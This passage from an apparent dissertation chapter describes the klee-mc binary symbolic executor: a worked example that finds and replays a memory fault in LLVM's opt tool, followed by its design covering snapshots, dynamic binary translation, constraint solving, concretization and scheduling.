program with a command line argument f.
In most cases, klee-mc reads its initial guest program state and code from a
program process snapshot. We will first acquire a snapshot and save it to disk; this
will make the replay process straightforward. The snapshot loaded by a snapshotter,
ptrun. Once optreaches its entry point, ptrunsaves the image to the file system:
VEXLLVM SAVE=1 pt run /usr/bin/opt f
Next, we run the symbolic executor klee-mc . The command line flag -guest-type
tells the system to read snapshot data from guest-last , a symlink to the last saved
snapshot in the current directory. Since klee-mc is primarily a research system,
there are a great deal of command line arguments (391 as of writing); the default set-
tings script uses about sixty flags to tune scheduler, solver, expression optimizer,
memory management, and other aspects of the executor. The rest of the flags
in the example control the state scheduler; a running state receives a five second
quanta ( -batch-time=5 ), states are scheduled based on fewest dispatched instructions
(-use-interleaved-MI ) and coverage of new branches ( -use-fresh-branch-search ),
scheduler policy is decided by code coverage rates ( -use-ticket-interleave ), and
a state’s quanta is reimbursed by covering new code ( -use-second-chance ).
klee-mc -guest-type=sshot -use-ticket-interleave -use-second-chance
-use-batching-search -batch-time=5
-use-interleaved-MI -use-fresh-branch-search -
klee-mc finds a memory fault on the 115th completed path. The error report
includes a stack trace of the program state at the point of failure, the faulting memory
address, and the nearest valid address:
Error : memory e r r o r : out of bound pointer
Stack :
#0 in ZN4llvm13BitcodeReader17MaterializeModuleEPNS 6ModuleE+0x0
#1 in ZN4llvm6Module14MaterializeAllEPSs+0x9
#2 in ZN4llvm6Module25MaterializeAllPermanentlyEPSs+0x0
#3 in ZN4llvm16ParseBitcodeFileEPNS 12MemoryBufferERNS 11LLVMContextEPSs+0x16
#4 in ZN4llvm7ParseIREPNS 12MemoryBufferERNS 12SMDiagnosticERNS 11LLVMContextE+0xf4
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 17
#5 in ZN4llvm11ParseIRFileERKSsRNS 12SMDiagnosticERNS 11LLVMContextE+0x2b0
#6 in main+0x1c0
#7 in libc start main+0xb1
#8 in start+0x0
address : 0x30
next : object at 0x400000 of s i z e 4096
Next, to confirm the result independently of the symbolic executor, the test is
replayed using kmc-replay . The kmc-replay utility runs the guest snapshot through
a concrete dynamic binary translator, filling in system call data by reading off test
data generated by klee-mc . We show the final 10 lines:
KMC RECONS FILES=1 kmc-replay 115 | tail -n10
[ kmc−replay ] Retired : sys=13 ( r t s i g a c t i o n ) . xsys =13. r e t =( n i l ) .
[ kmc−replay ] Applying : sys=13 ( r t s i g a c t i o n )
[ kmc−replay ] Retired : sys=13 ( r t s i g a c t i o n ) . xsys =13. r e t =( n i l ) .
[ kmc−replay ] Applying : sys=2 ( open )
[ kmc−sc ] OPEN ” f ” r e t=0x3
[ kmc−replay ] Retired : sys=2 ( open ) . xsys =2. r e t=0x3 .
[ kmc−replay ] Applying : sys=5 ( f s t a t )
[ kmc−replay ] Retired : sys=5 ( f s t a t ) . xsys =5. r e t =( n i l ) .
[ kmc−replay ] Applying : sys=17 ( pread64 )
Caught SIGSEGV but the mapping was a normal one @ 0x30
Replaying the test with the KMC RECONS FILES set means kmc-replay recon-
structed files symbolically derived in the test case by replaying the test’s system calls
back to the file system (e.g., open creates a file, pread64 writes data). This gives a
filerecons.0 which has contents that corresponds to a variable assignment, from a
pread64 system call, in the test as given by the ktest-tool utility:
ob jec t 4 : name : ’ readbuf 1 ’
ob jec t 4 : s i z e : 8
ob jec t 4 : data : ’BC \xc0\xde\n\n\n\n ’
Finally, putting the data back into optconfirms the memory fault natively on the
host by using the gdbdebugger to find a matching (demangled) backtrace:
gdb --args opt recons.0
( gdb ) run
Program r e c e i v e d s i g n a l SIGSEGV, Segmentation f a u l t .
. . . in llvm : : BitcodeReader : : MaterializeModule ( llvm : : Module ∗) ( ) from / usr / l i b /libLLVM −3.4. so
( gdb ) bt
#0 . . . in llvm : : BitcodeReader : : MaterializeModule ( llvm : : Module ∗) () from / usr / l i b /libLLVM −3.4. so
#1 . . . in llvm : : Module : : M a t e r i a l i z e A l l ( std : : s t r i n g ∗) ( ) from / usr / l i b /libLLVM −3.4. so
#2 . . . in llvm : : Module : : MaterializeAllPermanently ( . . . ) ( ) from / usr / l i b /libLLVM −3.4. so
#3 . . . in llvm : : ParseBitcodeFile ( . . . ) ( ) from / usr / l i b /libLLVM −3.4. so
#4 . . . in llvm : : ParseIR ( . . . ) ( ) from / usr / l i b /libLLVM −3.4. so
#5 . . . in llvm : : ParseIRFile ( . . . ) ( ) from / usr / l i b /libLLVM −3.4. so
#6 . . . in main ( )
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 18
2.4 Design of klee-mc
This section explains and justifies the major design decisions that went into klee-mc .
On one hand, the design is partially motivated by simply having the system run at
all; this highlights the changes necessary to retrofit a symbolic executor with machine
code capabilities. On the other hand, the rest of the design focuses on robustness so
that the system rarely breaks.
2.4.1 Program Snapshots
In order to execute a program, the symbolic executor must first have some way to load
the program into an internal representation. klee-mc uses process snapshots , point-
in-time copies of running program states, as its native initial representation of guest
programs. A snapshot is a copy of all resources from a running process; the reasoning
being that the symbolic executor can load a snapshot as a guest easier than starting
from a bare program. A process snapshot contains the data necessary to reconstruct
the state of a program running on a host system in klee-mc with minimal processing
and inspection.
Snapshots sidestep many of the issues that would otherwise arise from building a
custom program loader. If a program runs on a host, klee-mc can likely record and
run its snapshot, ultimately giving the system a wide program reach. Furthermore, by
decoupling the snapshotting process from the symbolic execution phase with indepen-
dent snapshotter programs, klee-mc symbolically executes programs from platforms
where it cannot run natively. Since snapshots are immutable, they resist side-effects
and non-determinism from new libraries, different linkers, and address space ran-
domization over multiple runs, which becomes relevant for replay cross-checking in
Chapter 3.
Snapshot Structure
Snapshots save the machine configuration of a running program process from a live
system for later use. The system snapshots a binary program by launching it as a
process and copying out all relevant resources; the snapshot has all data necessary
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 19
to rebuild the state of a running program within klee-mc for symbolic execution.
Likewise, to avoid complicating the executor with many special cases or making snap-
shots too onerous to build without sophisticated infrastructure, snapshots must be
somewhat generic in to support a variety of architectures and system platforms.
Snapshot data is structured as a directory tree of files representing resources loaded
from the process. The format is reasonably platform agnostic and portable; most
snapshot resources describe only the machine configuration information necessary for
programs to run with few, if any, strict assumptions about the host operating system.
These resources include:
Registers. The register file contains the stack pointer, program counter, floating-
point registers, vector registers, and general purpose registers. For processes with
threads, user registers for each thread (sometimes called the thread’s “context”) are
stored as individual files in a thread directory. Additionally, this includes system reg-
isters not directly accessible or modifiable by the program but necessary for program
execution (e.g., segment registers and descriptor tables for thread local storage).
Memory. Code and data from the process image are stored as files in a directory
containing all process memory. Each file represents a contiguous memory range from
the process, thereby keeping total file count low, reducing overhead, while exposing
the logical address space organization at the file system level, simplifying tooling.
These ranges include all libraries, heaps, and stacks and ensures all data remains
consistent from run to run. Memory ranges are disjoint, page-aligned, have access
permissions, and occasionally have names (e.g., memory mapped files); this extra
metadata is kept in a memory map information file.
Symbols. Assigning meaningful names to ranges of memory enhances the read-
ability of the symbolic analysis. Symbols from the program binary give these names
to ranges of memory. Symbol information is extracted from the process either by
analyzing the backing files (e.g., the program binary and its libraries) or through sys-
tem symbol facilities. The symbols are listed by symbol name and address range, and
are stored in a single text file. If no symbol information is available (e.g., stripped
binaries), the snapshot is still valid, but functions will be labeled by memory address.
Platform Specifics. Although snapshots ideally keep process details platform
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 20
agnostic, sometimes it is necessary to store data specific to a particular runtime model.
Information specific to the process host’s operating system is stored to the snapshot’s
platform-specific directory. For instance, the Windows pointer encoding key, which
decodes function pointers in core libraries at runtime, is stored as a platform attribute.
It is the responsibility of the symbolic system model to access the platform files. In the
future, richer models may use additional platform details; keeping platform-specific
information in one place will ease the development of such models.
Snapshotter
Each snapshot is collected by a snapshotting program, the snapshotter . Since snap-
shots have few dependencies on the rest of the klee-mc system, snapshotter code
can run on more systems than klee-mc itself (e.g., 32-bit architectures, non-Linux
operating systems), thus expanding the executor’s program reach without having to
port the system to new hosts. In fact, while snapshots may be portable, the snap-
shotter itself is not; fortunately, the host features necessary to build a snapshotter
correspond with features necessary to build a program debugger and therefore are
common to modern operating systems. Additionally, since points of interest in a pro-
cess’s execution may vary from program to program, the snapshotter has flexibility
in how and when it takes a snapshot.
A snapshotter stops a program and read its resources. In this sense, a snapshotter
is similar to a breakpointing debugger, which must stop a program at user-defined lo-
cations and read off program state when requested. For Linux, a debugger controls the
process with ptrace and reads process information from procfs . For Windows, the
functions DebugActiveProcess ,DebugBreakProcess , and so forth control the pro-
cess like ptrace whereas calls to functions like OpenProcess ,EnumProcessModules ,
andVirtualQueryEx access process information like procfs .
We found several modes for acquiring a snapshot useful in practice:
Program Entry Point. The first snapshot is taken immediately prior to dis-
patching the first system call past the program’s entry point. This captures the entire
program’s system call trace starting from its entry.
Launch and Wait. The snapshotter launches the process and traces system calls.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 21
Once the process dispatches the specified system call, it is snapshotted. Launching
and waiting helped when snapshotting Linux programs compiled as libraries because
the entry point is chosen by the runtime linker. The snapshotter waits for the first
munmap since the linker only unmaps memory immediately before calling the library
initialization function.
Process Attach. Begin snapshotting an already active program. Attaching is
useful for tracing interactive and long-running programs (e.g., web servers, network
file servers, and graphical user interfaces); the snapshot often begins at a system call
where the program is blocked and waiting for some input (e.g., select ).
Attach and Wait. Snapshot an already active program once it encounters a
particular system call. Waiting for a system call is useful for capturing specific runtime
events such as opening new files.
2.4.2 Dynamic Binary Translation
A dynamic binary translator converts a running program’s machine instructions to
a practical intermediate representation (IR) on demand. klee-mc uses a DBT to
translate its guest code from machine instructions, often x86-64 code, to the LLVM
IR for symbolic execution. The system converts machine code to LLVM IR in two
stages: first from machine code to the VEX IR using the valgrind [100] front-end,
then from the VEX IR to LLVM IR using a custom translation pass. In addition to
applying the DBT to the symbolic executor, we developed a just-in-time interpreter
(JIT) which compiles the LLVM IR back to machine code using the LLVM JIT then
runs the code to test the correctness of concrete execution; the JIT independently
confirms symbolically derived test cases to rule out symbolic executor errors when
processing LLVM IR from genuine machine code translation errors. For klee-mc to
work with the DBT, we significantly modify klee ’s instruction dispatch system to
support jumping between dynamically generated LLVM functions that model basic
blocks of machine code.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 22
C Machine (x86-64)
int main(void)
{char *bad=NULL;
int sym = 0;
read(0, &sym , sizeof(sym));
if (sym != 0) *bad=1;
return 0;}main:
400450: sub $0x18,%rsp
400454: xor %edi,%edi
400456: mov $0x4,%edx
40045b: lea 0xc(%rsp),%rsi
400560: movl $0x0,0xc(%rsp)
400568: callq read
40056d: mov 0xc(%rsp),%eax
400571: test %eax,%eax
400573: je 40057d
400575: movb $0x1,0x0
40057d: xor %eax,%eax
40057f: add $0x18, %rsp
400583: retq
VEX LLVM
IMark(0x40056D, 4)
t6 = 32Uto64(LDle(Add64(GET(32),0xC)))
PUT(0) = t6
IMark(0x400571, 2)
PUT(128) = 0x13:I64
t12 = 32Uto64(And(64to32(t6),64to32(t6)))
PUT(136) = t12
PUT(144) = 0x0:I64
IMark(0x400573, 2)
PUT(168) = 0x400573:I64
if (CmpEQ64(Shl64(t12,0x20),0x0))
goto 0x40057D
goto 0x400575define i64 @sb 0x40056d(%regTy*) {
%regCtx = bitcast %regTy* %0 to i64*
%RSP = getelementptr %regCtx, i32 4
%1 = load i64* %RSP
%2 = add %1, 12
%loadP = inttoptr %2 to i32*
%3 = load i32* %loadP, align 8
...
store 4195699, i64* %RIP
%9 = shl i64 %8, 32
%10 = icmp eq i64 %9, 0
br i1 %10, %exit then, %exit else
exit then: ret 0x40057d
exit else: ret 0x400575 }
Figure 2.2: Stages of translation annotated by propagation of symbolic state.
VEX-to-LLVM
This section describes the process for translating from machine code to LLVM code
inklee-mc ’s VEX-to-LLVM translation layer. As a guiding example, Figure 2.2
illustrates the stages of code translation in the DBT, showing which instructions would
process symbolic data under symbolic execution. The example goes from human-
friendly C source, a snippet of its compiled machine code, the snippet’s VEX IR,
then finally, the LLVM code suitable for symbolically execution.
The C code in the top left of Figure 2.2 is a small program that crashes given
a non-zero input. The program issues a read system call that writes data to the
symvariable. If the read succeeds and stores a non-zero value, the code dereferences
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 23
the null pointer bad, causing the program to crash. Otherwise, the program exits
normally. If symbolically executed, symis marked symbolic when applying the read
system call. Next, the initial program state forks into two states at the if, one where
symis assumed zero and another where symis assumed non-zero, to explore both
feasible paths; the zero state exits normally and the non-zero state crashes.
Compiling the C code produces machine code. In this case, the C code was com-
piled on an x86-64 architecture klee-mc host machine. A call to read dispatches a
system call, updating sym(stored in the stack at 0xc(%rsp) ). The test instruction
constructs the predicate for the ifstatement by checking whether the register %eax ,
loaded from sym, is zero. The conditional jump instruction, je, forks the state under
symbolic execution; the non-zero state falls through to the illegal memory access at
0x400575 and the zero jumps to an exit. Clearly, it is less than ideal to symbolically
execute code in this format due to the x86-64 instruction set’s CISC origins; there
are hundreds of instructions along with many encodings to complicate matters. Sec-
tion 3.5.2 demonstrates the difficulty of merely decoding machine instructions; direct
symbolic execution of machine code would prove even more challenging.
The VEX IR representation maps machine instructions into a simpler machine
model. The VEX code starts immediately after the read call; VEX IR decodes
machine code into basic blocks that only permit jumps as exits from the code block.
Like the machine code example, the VEX IR reads symfrom the stack; it assigns
it to a temporary register t6that is also stored to %eax through PUT(0) . Unlike
machine code, the VEX IR can have arbitrary length expressions in its instructions,
as demonstrated by its emulation of the test instruction, which is stored to t12. The
VEX IR constructs the branch predicate with the CmpEQ64 instruction. If the VEX
IR were symbolically executed, as in some systems [65, 92, 96], the state would fork
on the if, one jumping to the instruction at 0x40057d and the other jumping to the
instruction at 0x400575 . Although the VEX IR is more wieldy than machine code,
the language has over nine hundred instructions, making it an unsuitable target for
a small symbolic interpreter core.
Rather than attempting to symbolically dispatch every sort of VEX IR instruc-
tion, including those that arise infrequently, the system translates VEX IR to the
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 24
simpler LLVM IR in order to provide excellent support for a handful of instructions.
The translation from VEX to LLVM is straightforward; large VEX expressions are
flattened to LLVM single-operation semantics. For instance, the CmpEQ64 expression
from the example lowers to shlandicmp LLVM instructions. Each VEX basic block
translates to an LLVM function. An LLVMized basic block function takes one argu-
ment, the in-memory register set, and returns the program counter of the next basic
block to be processed by the program interpreter. Symbolic data flows through the
LLVM code like the VEX code; the icmp builds the condition predicate and the state
forks on the conditional branch br.
Just-In-Time Interpreter
The JIT interpreter controls all concrete details for the DBT subsystem in klee-mc .
All binary specific details that relate to concrete execution belong to the JIT; this
keeps the symbolic execution portion of klee-mc uncontaminated by most binary
minutia. These details include managing concrete program data corresponding to a
target program, collectively known as the guest , such as snapshots, translated code
caches, symbols, and application binary interfaces. In addition to describing guest
data, the JIT supports running guests concretely by executing basic blocks like a
traditional DBT system. Furthermore, through careful design, the JIT can replay
symbolically derived test cases independently of the symbolic executor.
The JIT interpreter concretely executes a snapshot by dynamically recompiling
its code with the VEX to LLVM translation machinery. First, the JIT loads the
snapshot’s memory regions in-place, or identity mapped , into its process; this mapping
method avoids the need for any address translation in the guest code since guest
addresses are fixed from host to JIT. Identity mapping relies on linking the JIT’s
executable to an unusual address and address space randomization so that the JIT’s
initial address space is disjoint from guest’s, eliminating address conflicts. Next, the
JIT loops, executing basic block after basic block. The JIT passes the guest’s program
counter address ato the DBT to retrieve an LLVM function which it compiles to a
machine code function fausing the LLVM JIT. The compiled function fahas full
access to the JIT’s memory but, since fais derived from the guest and therefore only
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 25
“knows” about guest data, memory accesses rarely, if ever, touch JIT memory; either
famanipulates the guest state or it crashes the guest. After the JIT runs fa, the
function returns a new address bwhich is used as the base for the next basic block
to run. This process of dispatching basic blocks continues until the guest crashes or
exits normally and is the basis of executor cross-checking in Section 3.3.3.
Whenever a basic block calls out to the operating system with a system call, the
JIT passes the arguments to a system call dispatcher. For basic execution of program
snapshots, as if they were running on the host system, a pass-through system call
dispatcher passes system calls straight to the host operating system. Snapshots from
other architectures, but still running Linux, use a system call translator based on
the QEMU [15] user-level emulation system call translation layer. The kmc-replay
utility demonstrated in Section 2.3, which concretely replays tests with the JIT, has a
system call dispatcher that fills in system call results based on a log ( §3.3.1) generated
along with each test case.
Symbolic Execution Model
klee in its original form made several major assumptions based on LLVM bitcode
that interfere with retrofitting a DBT to the system. First, it expects that all code
is loaded up front, which ignores dynamically loaded libraries, self-modifying code,
and problems associated with accurately dissembling variable-length opcode instruc-
tion sets such as x86-64. Next, the memory model relies on precise variable and
buffer information; it cannot generally reason about anonymous data sections from
snapshots without either having expensive and excessively large objects or raising
errors on page-straddling accesses. Finally, the environment assumes programs call
to system model through directly linked functions, rather than an indirect system
call mechanism which needs a custom dispatch path.
klee-mc uses a new basic block aware dispatch model to support dynamic binary
translation. Since the DBT translates machine code basic blocks to LLVM functions
that return the next program counter, klee-mc transfers control from one basic block
to another when it encounters an LLVM retinstruction. When the function is DBT
bitcode, klee-mc inspects the return value to determine the next code block to run
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 26
and uses the block exit code (e.g., call, return, jump, system call), as given by VEX,
to decide how to update the call stack. This separate mode for DBT code is necessary
because the on-demand translation of code forces the system to process basic blocks
individually; DBT basic blocks cannot be stitched together into klee -compatible
LLVM programs in general. To let DBT-generated basic blocks call LLVM bitcode,
klee-mc defaults to klee behavior when the returning function is native LLVM
bitcode and DBT behavior when the returning function is DBT bitcode.
Snapshots represent a program’s address space as a set of disjoint page-aligned
memory regions. This format conflicts with the klee model which accurately tracks
all memory objects (e.g., variables, arrays, heap data), at the byte level. Although
analysis of debugging information and memory heap data could reveal precise mem-
ory object data could potentially provide precise memory object layout information,
there is no guarantee such data will be available in a snapshot. Since totally accurate
memory object modeling is a lost cause and best-effort modeling implies false posi-
tives, klee-mc loads memory regions page-by-page into the initial symbolic state and
relaxes the klee memory model to permit contiguous cross-object memory accesses.
User-level binary programs communicate with the underlying operating system
through system calls whereas the klee model assumes programs communicate with
the system through library calls. While klee links model code with the program and
lets function calls bridge the gap between program and environment model, klee-mc
must explicitly handle system calls due to differing calling conventions. To issue a
system call, per VEX semantics, a basic block function sets its exit code to indicate
its intent to make a system call. The klee-mc basic block dispatcher intercepts this
system call exit code and redirects the state to call out to a symbolically executed
system call emulation bitcode library.
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 27
2.4.3 Expressions and Solving
Constraint solving on expressions is integral to symbolic execution systems from
branch feasibility checks to test case generation. Adapting a symbolic executor to ef-
fectively run machine code means optimizing for new, complex expressions and config-
uring its solver to deal with slow-running queries from difficult constraint sets. Given
the unpredictability of instructions from arbitrary binaries, solver failures should be
somewhat expected, and fallbacks should be available to recover expensive paths.
Expressions
Expressions form the core symbolic data type of the symbolic executor. A symbolic
expression is nearly indistinguishable from the sort of expressions found in math-
ematics or programming languages; an expression represents a sequence of closed
operations (e.g., two’s complement arithmetic) on other expressions, often illustrated
as a tree or described with a grammar ( klee ’s is in Figure 5.3), working down to a
class of expression atoms, such as numbers or variables, with no further structure.
Effective expression management uses rewrite rules based on operation identities to
keep expressions small and efficient.
Building a new expression provides a convenient opportunity for optimization.
Inklee terminology, all expressions are constructed via one of several expression
builders , depending on the system configuration. For instance, a requesting a new
expression (Sub x x) from an optimizing builder may return the constant 0if the
builder knows to apply the identity x−x= 0. Aside from obvious constant fold-
ing, where operations on constants are folded into a single constant, the optimizing
builder canonicalizes expressions and applies ad-hoc rules based on two’s-complement
identities to reduce expression size when possible.
Most expressions in klee-mc correspond to a sequence of LLVM instructions,
derived from machine code, operating on symbolic data. Due to the sophistication
of modern optimizing compilers and intricacies of modern machine instruction sets,
these instruction sequences can significantly differ from the original source and its in-
termediate bitcode representation. The compiler inserts vector instructions, collapses
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 28
conditions to arithmetic, twiddles bits, and so on to improve performance for a target
architecture. These machine optimizations stress the expression builder in ways never
exercised by LLVM bitcode, making new rules necessary for machine code.
To illustrate the new class of expressions common to machine code, consider a re-
ciprocal multiplication, which replaces an expensive division operation with a cheaper
multiplication operation, observed in practice:
(extract [127:67] (bvmul bv14757395258967641293 [128]x))
The expression multiplies xby a “magic” constant, the 64-bit reciprocal for 10, then
extracts the bits starting from bit 67 out of the result. On hardware, multipliers
are significantly cheaper than dividers, making this an excellent strength reduction.
On the other hand, to a constraint solver this causes queries to time out since a
128-bit multiply is much more costly than solving for a 64-bit divide. Undoing this
hardware-specific strength reduction by replacing the expression with x/10 halves
the bit-width thereby making the problem easier for the solver so that such queries
complete in reasonable time.
Although slowly adding ad-hoc rules to the expression builder would continue to
work to some extent, it is far from satisfactory for scaling up to tens of thousands of
programs. Early experiments with the expression builder indicated many complicated
boolean expressions were in fact tautologies that could be replaced with constants,
suggesting useful rewrite rules could be discovered automatically. Chapter 5 discusses
a method in this vein that klee-mc uses to derive general rules from program traces to
improve symbolic execution performance. Given that there are many more machine-
generated rules than ad-hoc rules and that these rules may still have subtle bugs,
klee-mc also supports inductive rule optimization checking at runtime to improve
the overall integrity of the expression optimization system ( §3.3.5).
Solver Stack
All path constraints, as given in Section 2.2.1, are expressions. The set of path con-
straints for each state is called a constraint set; every unique constraint set translates
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 29
to a set of assumptions Cthat, along with a challenge formula expression qsuch as
a candidate path constraint, make up a solver satisfiability query (C,q). The sym-
bolic executor’s solver decides whether the conjunction of the query’s assumptions
and formula is satisfiable, computing satisfying assignments as needed.
The executor organizes its solver as a sequence of processing phases pass queries
down to a general purpose constraint solver. Since the constraint solver ultimately
computes solutions to the boolean satisfiable problem, for which there is no known
efficient algorithm, it tends to either finish quickly by exploiting the query’s structure
or time out from exponential blow-up; klee-mc tries to both optimize for the fast
path and robustly recover from failures. Although all solver queries could be directly
sent to a constraint solver, the executor must inefficiently serialize a query to match
the solver’s input format. By caching solutions from prior solver requests, transform-
ing queries with optimizations to reduce overhead, and recognizing trivial solutions to
certain classes of queries, the stack can often avoid making an expensive solver call.
As a solver stack can become quite complicated and new stack components can sub-
tly fail, klee-mc supports cross-checking multiple stacks at runtime for mismatches
(§3.3.5).
As a whole, machine code programs need a robust solver stack. When running bi-
naries, we observed klee ’s solver stack would hang on cache look ups from traversing
huge expressions, the internal third-party solver would crash with call stack overflows,
and time-outs were too generous for acceptable forward progress. This experience in-
dicated failure should be expected and that robustness is more important than various
performance hacks. Figure 2.3 illustrates the default klee-mc solver organization as
informed by this experience; queries are processed by a few essential passes, then
passed to the solver through a robust, solver independent, conduit. For a query
(C,q), assumptions in Cindependent from the formula qare removed (as in klee ),
query results are cached using a new built-in hashing scheme with constant look up
time, and the executor communicates with the solver through isolated processes.
SMTLIB Serialization. klee-mc communicates with an isolated STP [55]
theorem prover process through a forked copy of its own process and UNIX pipe.
When the executor makes a solver call, it forks itself to create a serialization process
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 30
Figure 2.3: A solver stack with query serialization isolation.
and launches a new STP process. The serialization process streams the query as an
SMTLIB request to the STP process over an anonymous pipe. The parent process
then reads off the result from STP and terminates its children. Although the parent
process could write the SMTLIB query to the STP process directly without forking,
serialization of large queries causes the executor to hang; forking lets the parent
safely terminate the serializer if it times out. By totally separating the solver from
the executor, it is easier to swap it for other solvers; the SMT pipe solver supports
five solvers [13, 25, 49, 51, 55] with very little specialized code.
Although some systems propose supporting multiple solvers [105] so the best solver
for a query finishes first, we found linking multiple solvers to the executable made the
system difficult to build and keep up to date. Originally strong integration between
the executor and solver seemed as though it would lead to improved performance.
However, after writing two new custom solver interfaces, it became clear performance
was too unpredictable among solvers. Furthermore each solver had its own quirks
over how to best build a query, making tuning all but necessary.
Query Hashing. klee-mc caches query satisfiability and values with an array
insensitive hash computed at expression build time. Unlike klee ’s caching solvers,
array insensitivity lets queries with equivalent structure but different array names
share cache entries; each entry represents an equivalence class of all α-conversions.
Hashing boosts the hit rate, and therefore performance, at the expense of soundness
by ignoring distinct names. Although hashing is imprecise, unsound collisions were
never observed when tested against an array sensitive hash during program execution.
Furthermore, if an unsound path due to a hash collision were followed to completion,
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 31
then solving for its test case, which must go through the solver, would detect an
inconsistent constraint set.
Array name insensitivity improves performance when a program loops, construct-
ing the same queries, but with new array names (e.g., readbuf 1andreadbuf 2).
Furthermore, when only hash equality matters, cache look ups will not hang on deep
comparison of large expressions. For persistence, query hashes are stored in sorted
files according to query solution: sat, unsat, value, or timed out.
klee itself supports a caching proxy solver, solverd , with a persistent hash store
(likely a descendent of EXE’s cache server [29]). Unfortunately, it suffers from several
design issues compared to an in-process query hash cache. First, communicating with
solverd incurs costly interprocess communication through sockets. Next, the query
must be built up using STP library intrinsics, totally serialized to the SMTLIB format
in memory, then sent through a socket. For large queries, this serialization may crash
STP, take an inordinate amount of time, or use an excessive amount of memory.
Finally, when solverd MD5 hashes the entire SMTLIB string it misses queries that
are equivalent modulo array naming and must create a new entry.
State Concretization
When the solver times out on a query, there are three obvious options. One, the
time limit can be boosted, dedicating disproportionate time to costly states which
may not even exhibit interesting behavior. Two, the system can terminate the state,
throwing away potentially interesting child paths. Three, the system can drop the
state’s symbolics causing the time out, hence salvaging the remaining path. klee-mc
pursues this third option by concretizing state symbolics into concrete data.
Since state concretization is a fall-back mechanism for failed queries, every con-
cretization begins with a failed query ( C,q) on a stateS. Assuming the executor
did not corrupt any path constraints, the constraint set has a satisfying assignment
σ. Knowing the solver already proved C’s satisfiability, it can be assumed the solver
computesσwithout timing out. Likewise, if Csucceeds butC∧qcauses the solver to
fail, then only qneeds to be concretized to make forward progress. To concretize q,
the executor constructs a variable assignment for only variables in q,σq=σ∩q, then
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 32
applies this assignment to all symbolic data in S, yielding the partial concretization
Sσq. Note that σqneed not satisfy q, only that σqmust assign concrete values to all
ofq’s variables in addition to satisfying C.
Replacing symbolic data in Swithσqto get the stateSσqmust be exhaustive in
order to eliminate all references to q’s variables. The executor therefore applies σqto
the following parts of the state that may have symbolic data:
•Memory Objects – The executor scans all state data memory for symbolic data
with variables from q. To speed up scanning, the executor only inspects objects
which contain symbolic expressions; concrete pages are ignored.
•LLVM Call Stack – The LLVM call stack for Scontains the values for temporary
registers in LLVM code being evaluated by the executor. Usually one of these
values will contain qas the result of an icmp expression.
•Constraints – The state’s constraint set must reflect the concretization of terms
inqor future queries will be underconstrained. The executor applies the as-
signmentσqtoCto getCσq, the constraint set for Sσq.
•Arrays – The constraints on elements in qvanish inCσqbut must be recalled
to produce a correct test case. To track concretized constraints, the state Sσq
savesσqas a set of concrete arrays along with any remaining symbolic arrays.
The idea of concretizing state during symbolic execution is common. S2E [34]
uses lazy concretization to temporarily convert symbolic data to concrete on-demand
for its path corseting feature. SAGE [59] concretizes its states into tests and replays
them to discover new states. klee concretizes symbolic data where symbolic modeling
would be costly or difficult to implement. klee-mc is perhaps the first system that
uses partial concretization to recover from solver failure.
2.4.4 Scheduling
A symbolic executor generates many states while exploring a path tree. The number
of states almost always outnumbers the number of CPUs available to the symbolic
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 33
executor; the system must choose, or schedule, a set of states to run for a given
moment. Some states will cover new and interesting program behavior but others
will not; choosing the best states to schedule is the state searching problem.
Constructing good search heuristics for symbolic execution remains an open prob-
lem. Although a search heuristic can conceivably maximize for any metric, the stan-
dard metric is total code coverage. Many heuristics to improve code coverage rely
on overapproximations similar to those developed for static analysis. Unfortunately,
static analysis techniques fare poorly on DBTs since not only is code discovered on-
demand, providing a partial view of the code, but also because recovering control-flow
graphs from machine code demands additional effort [8].
Instead, klee-mc ignores the state searching problem in favor of throughput
scheduling. In this case, klee-mc tries to dynamically schedule states to improve
total coverage based on prior observation. Two policies are worth noting:
Second chances. If a state covers new code, its next scheduled preemption is
ignored. The reasoning is that if a state covers new code, it is likely to continue to
covering new code. If a state is preempted, it is possible it will never be scheduled
again, despite showing promise.
Ticket interleaved searcher. Given several schedulers, an interleaved searcher
must choose one scheduler to query. The ticket interleaved searcher is a lottery
scheduler [129] which probabilistically chooses a scheduler weighted by the number of
tickets a scheduler holds. The searcher assigns tickets to a scheduler when its states
cover new code and takes tickets when the states cover only old code. The reasoning
is that if a scheduler is doing well, it should continue to select states to run.
2.4.5 Runtime Libraries
klee-mc extends the executor with symbolically executed runtime libraries to im-
prove reliability by avoiding hard-coded modifications when possible. Runtime li-
braries are isolated from the executor’s inner-workings so they occasionally need new
interpreter intrinsic calls to communicate with the underlying system. Likewise, run-
time libraries call into convenience library code which builds library intrinsics from
CHAPTER 2. THE KLEE-MC BINARY PROGRAM SYMBOLIC EXECUTOR 34
lower level interpreter primitives. Binary guest programs invoke these libraries in-
directly through intermediate code intrinsics, aspect-like function instrumentation,
system calls, rewritten instructions ( §4.3.2), or data-dependent instruction paths
(§6.3).
Interpreter Intrinsics
A symbolically executed runtime library explicitly communicates with the symbolic
executor through interpreter intrinsics. An interpreter intrinsic, much like an operat-
ing system call, runs in the executor’s context and safely exposes symbolic executor
resources to guest code via an isolated, controlled conduit. Additionally, interpreter
intrinsics serve as simple symbolic execution primitives from which runtime code can
build more complicated operations that reason about symbolic state.
Choosing the right interpreter intrinsics presents challenges similar to designing
